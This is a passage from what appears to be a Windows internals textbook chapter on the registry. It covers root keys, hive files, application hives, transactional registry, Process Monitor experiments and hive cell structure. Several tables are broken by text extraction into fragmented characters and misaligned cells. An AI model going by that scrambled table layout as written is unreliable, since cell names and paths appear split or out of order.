CAL_MAC
HINE
H
K
L
M
Global settings
for the
machine
Not a link
HKEY_CU
RRENT_C
ONFIG
H
K
C
C
Current
hardware
profile
HKLM\SYSTEM\CurrentControl
Set\Hardware Profiles\Current
HKEY_PE
RFORMAN
CE_DATA
H
K
P
D
Performance
counters
Not a link
HKEY_PE
RFORMAN
CE_NLSTE
XT
H
K
P
N
T
Performance
counters text
strings
Not a link
HKEY_PE
H
Performance
Not a link
RFORMAN
CE_TEXT
K
P
T
counters text
strings in US
English
HKEY_CURRENT_USER
The HKCU root key contains data regarding the preferences and software
configuration of the locally logged-on user. It points to the currently logged-
on user’s user profile, located on the hard disk at \Users\
<username>\Ntuser.dat. (See the section “Registry internals” later in this
chapter to find out how root keys are mapped to files on the hard disk.)
Whenever a user profile is loaded (such as at logon time or when a service
process runs under the context of a specific username), HKCU is created to
map to the user’s key under HKEY_USERS (so if multiple users are logged
on in the system, each user would see a different HKCU). Table 10-4 lists
some of the subkeys under HKCU.
Table 10-4 HKEY_CURRENT_USER subkeys
Subkey
Description
AppEvents
Sound/event associations
Console
Command window settings (for example, width, height,
and colors)
Control
Panel
Screen saver, desktop scheme, keyboard, and mouse
settings, as well as accessibility and regional settings
Environme
nt
Environment variable definitions
EUDC
Information on end-user defined characters
Keyboard
Layout
Keyboard layout setting (for example, United States or
United Kingdom)
Network
Network drive mappings and settings
Printers
Printer connection settings
Software
User-specific software preferences
Volatile
Environme
nt
Volatile environment variable definitions
HKEY_USERS
HKU contains a subkey for each loaded user profile and user class
registration database on the system. It also contains a subkey named
HKU\.DEFAULT that is linked to the profile for the system (which is used
by processes running under the local system account and is described in more
detail in the section “Services” later in this chapter). This is the profile used
by Winlogon, for example, so that changes to the desktop background
settings in that profile will be implemented on the logon screen. When a user
logs on to a system for the first time and her account does not depend on a
roaming domain profile (that is, the user’s profile is obtained from a central
network location at the direction of a domain controller), the system creates a
profile for her account based on the profile stored in
%SystemDrive%\Users\Default.
The location under which the system stores profiles is defined by the
registry value HKLM\Software\Microsoft\Windows
NT\CurrentVersion\ProfileList\ProfilesDirectory, which is by default set to
%SystemDrive%\Users. The ProfileList key also stores the list of profiles
present on a system. Information for each profile resides under a subkey that
has a name reflecting the security identifier (SID) of the account to which the
profile corresponds. (See Chapter 7, “Security,” of Part 1 for more
information on SIDs.) Data stored in a profile’s key includes the time of the
last load of the profile in the LocalProfileLoadTimeLow value, the binary
representation of the account SID in the Sid value, and the path to the
profile’s on-disk hive (Ntuser.dat file, described later in this chapter in the
“Hives” section) in the directory given by the ProfileImagePath value.
Windows shows profiles stored on a system in the User Profiles management
dialog box, shown in Figure 10-1, which you access by clicking Configure
Advanced User Profile Properties in the User Accounts Control Panel
applet.
Figure 10-1 The User Profiles management dialog box.
EXPERIMENT: Watching profile loading and
unloading
You can see a profile load into the registry and then unload by
using the Runas command to launch a process in an account that’s
not currently logged on to the machine. While the new process is
running, run Regedit and note the loaded profile key under
HKEY_USERS. After terminating the process, perform a refresh in
Regedit by pressing the F5 key, and the profile should no longer be
present.
HKEY_CLASSES_ROOT
HKCR consists of three types of information: file extension associations,
COM class registrations, and the virtualized registry root for User Account
Control (UAC). (See Chapter 7 of Part 1 for more information on UAC.) A
key exists for every registered file name extension. Most keys contain a
REG_SZ value that points to another key in HKCR containing the association
information for the class of files that extension represents.
For example, HKCR\.xls would point to information on Microsoft Office
Excel files. For example, the default value contains “Excel.Sheet.8” that is
used to instantiate the Excel COM object. Other keys contain configuration
details for all COM objects registered on the system. The UAC virtualized
registry is located in the VirtualStore key, which is not related to the other
kinds of data stored in HKCR.
The data under HKEY_CLASSES_ROOT comes from two sources:
■ The per-user class registration data in HKCU\SOFTWARE\Classes
(mapped to the file on hard disk \Users\
<username>\AppData\Local\Microsoft\Windows\Usrclass.dat)
■ Systemwide class registration data in HKLM\SOFTWARE\Classes
There is a separation of per-user registration data from systemwide
registration data so that roaming profiles can contain customizations.
Nonprivileged users and applications can read systemwide data and can add
new keys and values to systemwide data (which are mirrored in their per-user
data), but they can only modify existing keys and values in their private data.
It also closes a security hole: a nonprivileged user cannot change or delete
keys in the systemwide version HKEY_CLASSES_ROOT; thus, it cannot
affect the operation of applications on the system.
HKEY_LOCAL_MACHINE
HKLM is the root key that contains all the systemwide configuration
subkeys: BCD00000000, COMPONENTS (loaded dynamically as needed),
HARDWARE, SAM, SECURITY, SOFTWARE, and SYSTEM.
The HKLM\BCD00000000 subkey contains the Boot Configuration
Database (BCD) information loaded as a registry hive. This database replaces
the Boot.ini file that was used before Windows Vista and adds greater
flexibility and isolation of per-installation boot configuration data. The
BCD00000000 subkey is backed by the hidden BCD file, which, on UEFI
systems, is located in \EFI\Microsoft\Boot. (For more information on the
BCD, see Chapter 12, "Startup and shutdown”).
Each entry in the BCD, such as a Windows installation or the command-
line settings for the installation, is stored in the Objects subkey, either as an
object referenced by a GUID (in the case of a boot entry) or as a numeric
subkey called an element. Most of these raw elements are documented in the
BCD reference in Microsoft Docs and define various command-line settings
or boot parameters. The value associated with each element subkey
corresponds to the value for its respective command-line flag or boot
parameter.
The BCDEdit command-line utility allows you to modify the BCD using
symbolic names for the elements and objects. It also provides extensive help
for all the boot options available. A registry hive can be opened remotely as
well as imported from a hive file: you can modify or read the BCD of a
remote computer by using the Registry Editor. The following experiment
shows you how to enable kernel debugging by using the Registry Editor.
EXPERIMENT: Remote BCD editing
Although you can modify offline BCD stores by using the bcdedit
/store command, in this experiment you will enable debugging
through editing the BCD store inside the registry. For the purposes
of this example, you edit the local copy of the BCD, but the point
of this technique is that it can be used on any machine’s BCD hive.
Follow these steps to add the /DEBUG command-line flag:
1.
Open the Registry Editor and then navigate to the
HKLM\BCD00000000 key. Expand every subkey so that
the numerical identifiers of each Elements key are fully
visible.
2.
Identify the boot entry for your Windows installation by
locating the Description with a Type value of 0x10200003,
and then select the 12000004 key in the Elements tree. In
the Element value of that subkey, you should find the name
of your version of Windows, such as Windows 10. In recent
systems, you may have more than one Windows installation
or various boot applications, like the Windows Recovery
Environment or Windows Resume Application. In those
cases, you may need to check the 22000002 Elements
subkey, which contains the path, such as \Windows.
3.
Now that you’ve found the correct GUID for your Windows
installation, create a new subkey under the Elements subkey
for that GUID and name it 0x260000a0. If this subkey
already exists, simply navigate to it. The found GUID
should correspond to the identifier value under the
Windows Boot Loader section shown by the bcdedit /v
command (you can use the /store command-line option to
inspect an offline store file).
4.
If you had to create the subkey, now create a binary value
called Element inside it.
5.
Edit the value and set it to 1. This will enable kernel-mode
debugging. Here’s what these changes should look like:
Note
The 0x12000004 ID corresponds to BcdLibraryString_ApplicationPath,
whereas the 0x22000002 ID corresponds to
BcdOSLoaderString_SystemRoot. Finally, the ID you added, 0x260000a0,
corresponds to BcdOSLoaderBoolean_KernelDebuggerEnabled. These
values are documented in the BCD reference in Microsoft Docs.
The HKLM\COMPONENTS subkey contains information pertinent to the
Component Based Servicing (CBS) stack. This stack contains various files
and resources that are part of a Windows installation image (used by the
Automated Installation Kit or the OEM Preinstallation Kit) or an active
installation. The CBS APIs that exist for servicing purposes use the
information located in this key to identify installed components and their
configuration information. This information is used whenever components
are installed, updated, or removed either individually (called units) or in
groups (called packages). To optimize system resources, because this key can
get quite large, it is only dynamically loaded and unloaded as needed if the
CBS stack is servicing a request. This key is backed by the COMPONENTS
hive file located in \Windows\system32\config.
The HKLM\HARDWARE subkey maintains descriptions of the system’s
legacy hardware and some hardware device-to-driver mappings. On a
modern system, only a few peripherals—such as keyboard, mouse, and ACPI
BIOS data—are likely to be found here. The Device Manager tool lets you
view registry hardware information that it obtains by simply reading values
out of the HARDWARE key (although it primarily uses the
HKLM\SYSTEM\CurrentControlSet\Enum tree).
HKLM\SAM holds local account and group information, such as user
passwords, group definitions, and domain associations. Windows Server
systems operating as domain controllers store domain accounts and groups in
Active Directory, a database that stores domainwide settings and
information. (Active Directory isn’t described in this book.) By default, the
security descriptor on the SAM key is configured so that even the
administrator account doesn’t have access.
HKLM\SECURITY stores systemwide security policies and user-rights
assignments. HKLM\SAM is linked into the SECURITY subkey under
HKLM\SECURITY\SAM. By default, you can’t view the contents of
HKLM\SECURITY or HKLM\SAM because the security settings of those
keys allow access only by the System account. (System accounts are
discussed in greater detail later in this chapter.) You can change the security
descriptor to allow read access to administrators, or you can use PsExec to
run Regedit in the local system account if you want to peer inside. However,
that glimpse won’t be very revealing because the data is undocumented and
the passwords are encrypted with one-way mapping—that is, you can’t
determine a password from its encrypted form. The SAM and SECURITY
subkeys are backed by the SAM and SECURITY hive files located in the
\Windows\system32\config path of the boot partition.
HKLM\SOFTWARE is where Windows stores systemwide configuration
information not needed to boot the system. Also, third-party applications
store their systemwide settings here, such as paths to application files and
directories and licensing and expiration date information.
HKLM\SYSTEM contains the systemwide configuration information
needed to boot the system, such as which device drivers to load and which
services to start. The key is backed by the SYSTEM hive file located in
\Windows\system32\config. The Windows Loader uses registry services
provided by the Boot Library for being able to read and navigate through the
SYSTEM hive.
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG is just a link to the current hardware profile,
stored under HKLM\SYSTEM\CurrentControlSet\Hardware Profiles\Current.
Hardware profiles are no longer supported in Windows, but the key still
exists to support legacy applications that might depend on its presence.
HKEY_PERFORMANCE_DATA and
HKEY_PERFORMANCE_TEXT
The registry is the mechanism used to access performance counter values on
Windows, whether those are from operating system components or server
applications. One of the side benefits of providing access to the performance
counters via the registry is that remote performance monitoring works “for
free” because the registry is easily accessible remotely through the normal
registry APIs.
You can access the registry performance counter information directly by
opening a special key named HKEY_PERFORMANCE_DATA and querying
values beneath it. You won’t find this key by looking in the Registry Editor;
this key is available only programmatically through the Windows registry
functions, such as RegQueryValueEx. Performance information isn’t actually
stored in the registry; the registry functions redirect access under this key to
live performance information obtained from performance data providers.
The HKEY_PERFORMANCE_TEXT is another special key used to obtain
performance counter information (usually name and description). You can
obtain the name of any performance counter by querying data from the
special Counter registry value. The Help special registry value yields all the
counters description instead. The information returned by the special key are
in US English. The HKEY_PERFORMANCE_NLSTEXT retrieves
performance counters names and descriptions in the language in which the
OS runs.
You can also access performance counter information by using the
Performance Data Helper (PDH) functions available through the
Performance Data Helper API (Pdh.dll). Figure 10-2 shows the components
involved in accessing performance counter information.
Figure 10-2 Registry performance counter architecture.
As shown in Figure 10-2, this registry key is abstracted by the
Performance Library (Perflib), which is statically linked in Advapi32.dll. The
Windows kernel has no knowledge about the
HKEY_PERFORMANCE_DATA registry key, which explains why it is not
shown in the Registry Editor.
Application hives
Applications are normally able to read and write data from the global
registry. When an application opens a registry key, the Windows kernel
performs an access check verification against the access token of its process
(or thread in case the thread is impersonating; see Chapter 7 in Part 1 for
more details) and the ACL that a particular key contains. An application is
also able to load and save registry hives by using the RegSaveKeyEx and
RegLoadKeyEx APIs. In those scenarios, the application operates on data that
other processes running at a higher or same privilege level can interfere with.
Furthermore, for loading and saving hives, the application needs to enable the
Backup and Restore privileges. The two privileges are granted only to
processes that run with an administrative account.
Clearly this was a limitation for most applications that want to access a
private repository for storing their own settings. Windows 7 has introduced
the concept of application hives. An application hive is a standard hive file
(which is linked to the proper log files) that can be mounted visible only to
the application that requested it. A developer can create a base hive file by
using the RegSaveKeyEx API (which exports the content of a regular registry
key in an hive file). The application can then mount the hive privately using
the RegLoadAppKey function (specifying the REG_PROCESS_APPKEY flag
prevents other applications from accessing the same hive). Internally, the
function performs the following operations:
1.
Creates a random GUID and assigns it to a private namespace, in the
form of \Registry\A\<Random Guid>. (\Registry forms the NT kernel
registry namespace, described in the “The registry namespace and
operation” section later in this chapter.)
2.
Converts the DOS path of the specified hive file name in NT format
and calls the NtLoadKeyEx native API with the proper set of
parameters.
The NtLoadKeyEx function calls the regular registry callbacks. However,
when it detects that the hive is an application hive, it uses CmLoadAppKey to
load it (and its associated log files) in the private namespace, which is not
enumerable by any other application and is tied to the lifetime of the calling
process. (The hive and log files are still mapped in the “registry process,”
though. The registry process will be described in the “Startup and registry
process” section later in this chapter.) The application can use standard
registry APIs to read and write its own private settings, which will be stored
in the application hive. The hive will be automatically unloaded when the
application exits or when the last handle to the key is closed.
Application hives are used by different Windows components, like the
Application Compatibility telemetry agent (CompatTelRunner.exe) and the
Modern Application Model. Universal Windows Platform (UWP)
applications use application hives for storing information of WinRT classes
that can be instantiated and are private for the application. The hive is stored
in a file called ActivationStore.dat and is consumed primarily by the
Activation Manager when an application is launched (or more precisely, is
“activated”). The Background Infrastructure component of the Modern
Application Model uses the data stored in the hive for storing background
tasks information. In that way, when a background task timer elapses, it
knows exactly in which application library the task’s code resides (and the
activation type and threading model).
Furthermore, the modern application stack provides to UWP developers
the concept of Application Data containers, which can be used for storing
settings that can be local to the device in which the application runs (in this
case, the data container is called local) or can be automatically shared
between all the user’s devices that the application is installed on. Both kinds
of containers are implemented in the Windows.Storage.ApplicationData.dll
WinRT library, which uses an application hive, local to the application (the
backing file is called settings.dat), to store the settings created by the UWP
application.
Both the settings.dat and the ActivationStore.dat hive files are created by
the Modern Application Model’s Deployment process (at app-installation
time), which is covered extensively in Chapter 8, “System mechanisms,”
(with a general discussion of packaged applications). The Application Data
containers are documented at https://docs.microsoft.com/en-
us/windows/uwp/get-started/settings-learning-track.
Transactional Registry (TxR)
Thanks to the Kernel Transaction Manager (KTM; for more information see
the section about the KTM in Chapter 8), developers have access to a
straightforward API that allows them to implement robust error-recovery
capabilities when performing registry operations, which can be linked with
nonregistry operations, such as file or database operations.
Three APIs support transactional modification of the registry:
RegCreateKeyTransacted, RegOpenKeyTransacted, and
RegDeleteKeyTransacted. These new routines take the same parameters as
their nontransacted analogs except that a new transaction handle parameter is
added. A developer supplies this handle after calling the KTM function
CreateTransaction.
After a transacted create or open operation, all subsequent registry
operations—such as creating, deleting, or modifying values inside the key—
will also be transacted. However, operations on the subkeys of a transacted
key will not be automatically transacted, which is why the third API,
RegDeleteKeyTransacted exists. It allows the transacted deletion of subkeys,
which RegDeleteKeyEx would not normally do.
Data for these transacted operations is written to log files using the
common logging file system (CLFS) services, similar to other KTM
operations. Until the transaction is committed or rolled back (both of which
might happen programmatically or as a result of a power failure or system
crash, depending on the state of the transaction), the keys, values, and other
registry modifications performed with the transaction handle will not be
visible to external applications through the nontransacted APIs. Also,
transactions are isolated from each other; modifications made inside one
transaction will not be visible from inside other transactions or outside the
transaction until the transaction is committed.
Note
A nontransactional writer will abort a transaction in case of conflict—for
example, if a value was created inside a transaction and later, while the
transaction is still active, a nontransactional writer tries to create a value
under the same key. The nontransactional operation will succeed, and all
operations in the conflicting transaction will be aborted.
The isolation level (the “I” in ACID) implemented by TxR resource
managers is read-commit, which means that changes become available to
other readers (transacted or not) immediately after being committed. This
mechanism is important for people who are familiar with transactions in
databases, where the isolation level is predictable-reads (or cursor-stability,
as it is called in database literature). With a predictable-reads isolation level,
after you read a value inside a transaction, subsequent reads returns the same
data. Read-commit does not make this guarantee. One of the consequences is
that registry transactions can’t be used for “atomic” increment/decrement
operations on a registry value.
To make permanent changes to the registry, the application that has been
using the transaction handle must call the KTM function CommitTransaction.
(If the application decides to undo the changes, such as during a failure path,
it can call the RollbackTransaction API.) The changes are then visible
through the regular registry APIs as well.
Note
If a transaction handle created with CreateTransaction is closed before
the transaction is committed (and there are no other handles open to that
transaction), the system rolls back that transaction.
Apart from using the CLFS support provided by the KTM, TxR also stores
its own internal log files in the %SystemRoot%\System32\Config\Txr folder
on the system volume; these files have a .regtrans-ms extension and are
hidden by default. There is a global registry resource manager (RM) that
services all the hives mounted at boot time. For every hive that is mounted
explicitly, an RM is created. For applications that use registry transactions,
the creation of an RM is transparent because KTM ensures that all RMs
taking part in the same transaction are coordinated in the two-phase
commit/abort protocol. For the global registry RM, the CLFS log files are
stored, as mentioned earlier, inside System32\Config\Txr. For other hives,
they are stored alongside the hive (in the same directory). They are hidden
and follow the same naming convention, ending in .regtrans-ms. The log file
names are prefixed with the name of the hive to which they correspond.
Monitoring registry activity
Because the system and applications depend so heavily on configuration
settings to guide their behavior, system and application failures can result
from changing registry data or security. When the system or an application
fails to read settings that it assumes it will always be able to access, it might
not function properly, display error messages that hide the root cause, or even
crash. It’s virtually impossible to know what registry keys or values are
misconfigured without understanding how the system or the application that’s
failing is accessing the registry. In such situations, the Process Monitor utility
from Windows Sysinternals (https://docs.microsoft.com/en-us/sysinternals/)
might provide the answer.
Process Monitor lets you monitor registry activity as it occurs. For each
registry access, Process Monitor shows you the process that performed the
access; the time, type, and result of the access; and the stack of the thread at
the moment of the access. This information is useful for seeing how
applications and the system rely on the registry, discovering where
applications and the system store configuration settings, and troubleshooting
problems related to applications having missing registry keys or values.
Process Monitor includes advanced filtering and highlighting so that you can
zoom in on activity related to specific keys or values or to the activity of
particular processes.
Process Monitor internals
Process Monitor relies on a device driver that it extracts from its executable
image at runtime before starting it. Its first execution requires that the account
running it has the Load Driver privilege as well as the Debug privilege;
subsequent executions in the same boot session require only the Debug
privilege because, once loaded, the driver remains resident.
EXPERIMENT: Viewing registry activity on an idle
system
Because the registry implements the RegNotifyChangeKey function
that applications can use to request notification of registry changes
without polling for them, when you launch Process Monitor on a
system that’s idle you should not see repetitive accesses to the same
registry keys or values. Any such activity identifies a poorly written
application that unnecessarily negatively affects a system’s overall
performance.
Run Process Monitor, make sure that only the Show Registry
Activity icon is enabled in the toolbar (with the goal to remove
noise generated by the File system, network, and processes or
threads) and, after several seconds, examine the output log to see
whether you can spot polling behavior. Right-click an output line
associated with polling and then choose Process Properties from
the context menu to view details about the process performing the
activity.
EXPERIMENT: Using Process Monitor to locate
application registry settings
In some troubleshooting scenarios, you might need to determine
where in the registry the system or an application stores particular
settings. This experiment has you use Process Monitor to discover
the location of Notepad’s settings. Notepad, like most Windows
applications, saves user preferences—such as word-wrap mode,
font and font size, and window position—across executions. By
having Process Monitor watching when Notepad reads or writes its
settings, you can identify the registry key in which the settings are
stored. Here are the steps for doing this:
1.
Have Notepad save a setting you can easily search for in a
Process Monitor trace. You can do this by running Notepad,
setting the font to Times New Roman, and then exiting
Notepad.
2.
Run Process Monitor. Open the filter dialog box and the
Process Name filter, and type notepad.exe as the string to
match. Confirm by clicking the Add button. This step
specifies that Process Monitor will log only activity by the
notepad.exe process.
3.
Run Notepad again, and after it has launched, stop Process
Monitor’s event capture by toggling Capture Events on the
Process Monitor File menu.
4.
Scroll to the top line of the resultant log and select it.
5.
Press Ctrl+F to open a Find dialog box, and search for
times new. Process Monitor should highlight a line like the
one shown in the following screen that represents Notepad
reading the font value from the registry. Other operations in
the immediate vicinity should relate to other Notepad
settings.
6.
Right-click the highlighted line and click Jump To. Process
Monitor starts Regedit (if it’s not already running) and
causes it to navigate to and select the Notepad-referenced
registry value.
Registry internals
This section describes how the configuration manager—the executive
subsystem that implements the registry—organizes the registry’s on-disk
files. We’ll examine how the configuration manager manages the registry as
applications and other operating system components read and change registry
keys and values. We’ll also discuss the mechanisms by which the
configuration manager tries to ensure that the registry is always in a
recoverable state, even if the system crashes while the registry is being
modified.
Hives
On disk, the registry isn’t simply one large file but rather a set of discrete
files called hives. Each hive contains a registry tree, which has a key that
serves as the root or starting point of the tree. Subkeys and their values reside
beneath the root. You might think that the root keys displayed by the Registry
Editor correlate to the root keys in the hives, but such is not the case. Table
10-5 lists registry hives and their on-disk file names. The path names of all
hives except for user profiles are coded into the configuration manager. As
the configuration manager loads hives, including system profiles, it notes
each hive’s path in the values under the
HKLM\SYSTEM\CurrentControlSet\Control\Hivelist subkey, removing the
path if the hive is unloaded. It creates the root keys, linking these hives
together to build the registry structure you’re familiar with and that the
Registry Editor displays.
Table 10-5 On-disk files corresponding to paths in the registry
Hive Registry Path
Hive File Path
HKEY_LOCAL_MA
CHINE\BCD0000000
0
\EFI\Microsoft\Boot
HKEY_LOCAL_MA
CHINE\COMPONEN
TS
%SystemRoot%\System32\Config\Component
s
HKEY_LOCAL_MA
CHINE\SYSTEM
%SystemRoot%\System32\Config\System
HKEY_LOCAL_MA
CHINE\SAM
%SystemRoot%\System32\Config\Sam
HKEY_LOCAL_MA
%SystemRoot%\System32\Config\Security
CHINE\SECURITY
HKEY_LOCAL_MA
CHINE\SOFTWARE
%SystemRoot%\System32\Config\Software
HKEY_LOCAL_MA
CHINE\HARDWARE
Volatile hive
\HKEY_LOCAL_MA
CHINE\WindowsApp
LockerCache
%SystemRoot%\System32\AppLocker\AppCa
che.dat
HKEY_LOCAL_MA
CHINE\ELAM
%SystemRoot%\System32\Config\Elam
HKEY_USERS\<SID
of local service
account>
%SystemRoot%\ServiceProfiles\LocalService\
Ntuser.dat
HKEY_USERS\<SID
of network service
account>
%SystemRoot%\ServiceProfiles\NetworkServi
ce\NtUser.dat
HKEY_USERS\<SID
of username>
\Users\<username>\Ntuser.dat
HKEY_USERS\<SID
of username>_Classes
\Users\
<username>\AppData\Local\Microsoft\Windo
ws\Usrclass.dat
HKEY_USERS\.DEF
AULT
%SystemRoot%\System32\Config\Default
Virtualized
HKEY_LOCAL_MA
Different paths. Usually
CHINE\SOFTWARE
\ProgramData\Packages\<PackageFullName>\
<UserSid>\SystemAppData\Helium\Cache\
<RandomName>.dat for Centennial
Virtualized
HKEY_CURRENT_U
SER
Different paths. Usually
\ProgramData\Packages\<PackageFullName>\
<UserSid>\SystemAppData\Helium\User.dat
for Centennial
Virtualized
HKEY_LOCAL_MA
CHINE\SOFTWARE\
Classes
Different paths. Usually
\ProgramData\Packages\<PackageFullName>\
<UserSid>\SystemAppData\Helium\UserClass
es.dat for Centennial
You’ll notice that some of the hives listed in Table 10-5 are volatile and
don’t have associated files. The system creates and manages these hives
entirely in memory; the hives are therefore temporary. The system creates
volatile hives every time it boots. An example of a volatile hive is the
HKLM\HARDWARE hive, which stores information about physical devices
and the devices’ assigned resources. Resource assignment and hardware
detection occur every time the system boots, so not storing this data on disk
is logical. You will also notice that the last three entries in the table represent
virtualized hives. Starting from Windows 10 Anniversary Update, the NT
kernel supports the Virtualized Registry (VReg), with the goal to provide
support for Centennial packaged applications, which runs in a Helium
container. Every time the user runs a centennial application (like the modern
Skype, for example), the system mounts the needed package hives.
Centennial applications and the Modern Application Model have been
extensively discussed in Chapter 8.
EXPERIMENT: Manually loading and unloading
hives
Regedit has the ability to load hives that you can access through its
File menu. This capability can be useful in troubleshooting
scenarios where you want to view or edit a hive from an unbootable
system or a backup medium. In this experiment, you’ll use Regedit
to load a version of the HKLM\SYSTEM hive that Windows Setup
creates during the install process.
1.
Hives can be loaded only underneath HKLM or HKU, so
open Regedit, select HKLM, and choose Load Hive from
the Regedit File menu.
2.
Navigate to the %SystemRoot%\System32\Config\RegBack
directory in the Load Hive dialog box, select System, and
open it. Some newer systems may not have any file in the
RegBack folder. In that case, you can try the same
experiment by opening the ELAM hive located in the
Config folder. When prompted, type Test as the name of
the key under which it will load.
3.
Open the newly created HKLM\Test key and explore the
contents of the hive.
4.
Open HKLM\SYSTEM\CurrentControlSet\Control\Hivelist
and locate the entry \Registry\Machine\Test, which
demonstrates how the configuration manager lists loaded
hives in the Hivelist key.
5.
Select HKLM\Test and then choose Unload Hive from the
Regedit File menu to unload the hive.
Hive size limits
In some cases, hive sizes are limited. For example, Windows places a limit
on the size of the HKLM\SYSTEM hive. It does so because Winload reads
the entire HKLM\SYSTEM hive into physical memory near the start of the
boot process when virtual memory paging is not enabled. Winload also loads
Ntoskrnl and boot device drivers into physical memory, so it must constrain
the amount of physical memory assigned to HKLM\SYSTEM. (See Chapter
12 for more information on the role Winload plays during the startup
process.) On 32-bit systems, Winload allows the hive to be as large as 400
MB or half the amount of physical memory on the system, whichever is
lower. On x64 systems, the lower bound is 2 GB.
Startup and the registry process
Before Windows 8.1, the NT kernel was using paged pool for storing the
content of every loaded hive file. Most of the hives loaded in the system
remained in memory until the system shutdown (a good example is the
SOFTWARE hive, which is loaded by the Session Manager after phase 1 of
the System startup is completed and sometimes could be multiple hundreds of
megabytes in size). Paged pool memory could be paged out by the balance
set manager of the memory manager, if it is not accessed for a certain amount
of time (see Chapter 5, “Memory management,” in Part 1 for more details).
This implies that unused parts of a hive do not remain in the working set for a
long time. Committed virtual memory is backed by the page file and requires
the system Commit charge to be increased, reducing the total amount of
virtual memory available for other purposes.
To overcome this problem, Windows 10 April 2018 Update (RS4)
introduced support for the section-backed registry. At phase 1 of the NT
kernel initialization, the Configuration manager startup routine initializes
multiple components of the Registry: cache, worker threads, transactions,
callbacks support, and so on. It then creates the Key object type, and, before
loading the needed hives, it creates the Registry process. The Registry
process is a fully-protected (same protection as the SYSTEM process:
WinSystem level), minimal process, which the configuration manager uses
for performing most of the I/Os on opened registry hives. At initialization
time, the configuration manager maps the preloaded hives in the Registry
process. The preloaded hives (SYSTEM and ELAM) continue to reside in
nonpaged memory, though (which is mapped using kernel addresses). Later
in the boot process, the Session Manager loads the Software hive by invoking
the NtInitializeRegistry system call.
A section object backed by the “SOFTWARE” hive file is created: the
configuration manager divides the file in 2-MB chunks and creates a reserved
mapping in the Registry process’s user-mode address space for each of them
(using the NtMapViewOfSection native API. Reserved mappings are tracked
by valid VADs, but no actual pages are allocated. See Chapter 5 in Part 1 for
further details). Each 2-MB view is read-only protected. When the
configuration manager wants to read some data from the hive, it accesses the
view’s pages and produces an access fault, which causes the shared pages to
be brought into memory by the memory manager. At that time, the system
working set charge is increased, but not the commit charge (the pages are
backed by the hive file itself, and not by the page file).
At initialization time, the configuration manager sets the hard-working set
limit to the Registry process at 64 MB. This means that in high memory
pressure scenarios, it is guaranteed that no more than 64 MB of working set
is consumed by the registry. Every time an application or the system uses the
APIs to access the registry, the configuration manager attaches to the
Registry process address space, performs the needed work, and returns the
results. The configuration manager doesn’t always need to switch address
spaces: when the application wants to access a registry key that is already in
the cache (a Key control block already exists), the configuration manager
skips the process attach and returns the cached data. The registry process is
primarily used for doing I/O on the low-level hive file.
When the system writes or modifies registry keys and values stored in a
hive, it performs a copy-on-write operation (by first changing the memory
protection of the 2 MB view to PAGE_WRITECOPY). Writing to memory
marked as copy-on-write creates new private pages and increases the system
commit charge. When a registry update is requested, the system immediately
writes new entries in the hive’s log, but the writing of the actual pages
belonging to the primary hive file is deferred. Dirty hive’s pages, as for every
normal memory page, can be paged out to disk. Those pages are written to
the primary hive file when the hive is being unloaded or by the Reconciler:
one of the configuration manager’s lazy writer threads that runs by default
once every hour (the time period is configurable by setting the
HKLM\SYSTEM\ CurrentControlSet\Control\Session
Manager\Configuration Manager\RegistryLazyReconcileInterval registry
value).
The Reconciler and the Incremental logging are discussed in the
“Incremental logging” section later in this chapter.
Registry symbolic links
A special type of key known as a registry symbolic link makes it possible for
the configuration manager to link keys to organize the registry. A symbolic
link is a key that redirects the configuration manager to another key. Thus,
the key HKLM\SAM is a symbolic link to the key at the root of the SAM
hive. Symbolic links are created by specifying the REG_CREATE_LINK
parameter to RegCreateKey or RegCreateKeyEx. Internally, the configuration
manager will create a REG_LINK value called SymbolicLinkValue, which
contains the path to the target key. Because this value is a REG_LINK
instead of a REG_SZ, it will not be visible with Regedit—it is, however, part
of the on-disk registry hive.
EXPERIMENT: Looking at hive handles
The configuration manager opens hives by using the kernel handle
table (described in Chapter 8) so that it can access hives from any
process context. Using the kernel handle table is an efficient
alternative to approaches that involve using drivers or executive
components to access from the System process only handles that
must be protected from user processes. You can start Process
Explorer as Administrator to see the hive handles, which will be
displayed as being opened in the System process. Select the System
process, and then select Handles from the Lower Pane View menu
entry on the View menu. Sort by handle type, and scroll until you
see the hive files, as shown in the following screen.
Hive structure
The configuration manager logically divides a hive into allocation units
called blocks in much the same way that a file system divides a disk into
clusters. By definition, the registry block size is 4096 bytes (4 KB). When
new data expands a hive, the hive always expands in block-granular
increments. The first block of a hive is the base block.
The base block includes global information about the hive, including a
signature—regf—that identifies the file as a hive, two updated sequence
numbers, a time stamp that shows the last time a write operation was initiated
on the hive, information on registry repair or recovery performed by
Winload, the hive format version number, a checksum, and the hive file’s
internal file name (for example,
\Device\HarddiskVolume1\WINDOWS\SYSTEM32\CONFIG\SAM). We’ll
clarify the significance of the two updated sequence numbers and time stamp
when we describe how data is written to a hive file.
The hive format version number specifies the data format within the hive.
The configuration manager uses hive format version 1.5, which supports
large values (values larger than 1 MB are supported) and improved searching
(instead of caching the first four characters of a name, a hash of the entire
name is used to reduce collisions). Furthermore, the configuration manager
supports differencing hives introduced for container support. Differencing
hives uses hive format 1.6.
Windows organizes the registry data that a hive stores in containers called
cells. A cell can hold a key, a value, a security descriptor, a list of subkeys, or
a list of key values. A four-byte character tag at the beginning of a cell’s data
describes the data’s type as a signature. Table 10-6 describes each cell data
type in detail. A cell’s header is a field that specifies the cell’s size as the 1’s
complement (not present in the CM_ structures). When a cell joins a hive and
the hive must expand to contain the cell, the system creates an allocation unit
called a bin.
Table 10-6 Cell data types
D
a
t
a
T
y
St
r
u
ct
u
re
Description
p
e
T
y
p
e
K
e
y
c
el
l
C
M
_
K
E
Y
_
N
O
D
E
A cell that contains a registry key, also called a key node. A
key cell contains a signature (kn for a key, kl for a link node),
the time stamp of the most recent update to the key, the cell
index of the key’s parent key cell, the cell index of the subkey-
list cell that identifies the key’s subkeys, a cell index for the
key’s security descriptor cell, a cell index for a string key that
specifies the class name of the key, and the name of the key
(for example, CurrentControlSet). It also saves cached
information such as the number of subkeys under the key, as
well as the size of the largest key, value name, value data, and
class name of the subkeys under this key.
V
al
u
e
c
el
l
C
M
_
K
E
Y
_
V
A
L
U
E
A cell that contains information about a key’s value. This cell
includes a signature (kv), the value’s type (for example, REG_
DWORD or REG_BINARY), and the value’s name (for
example, Boot-Execute). A value cell also contains the cell
index of the cell that contains the value’s data.
B
i
g
V
al
u
C
M
_
B
I
G
A cell that represents a registry value bigger than 16 kB. For
this kind of cell type, the cell content is an array of cell indexes
each pointing to a 16-kB cell, which contains a chunk of the
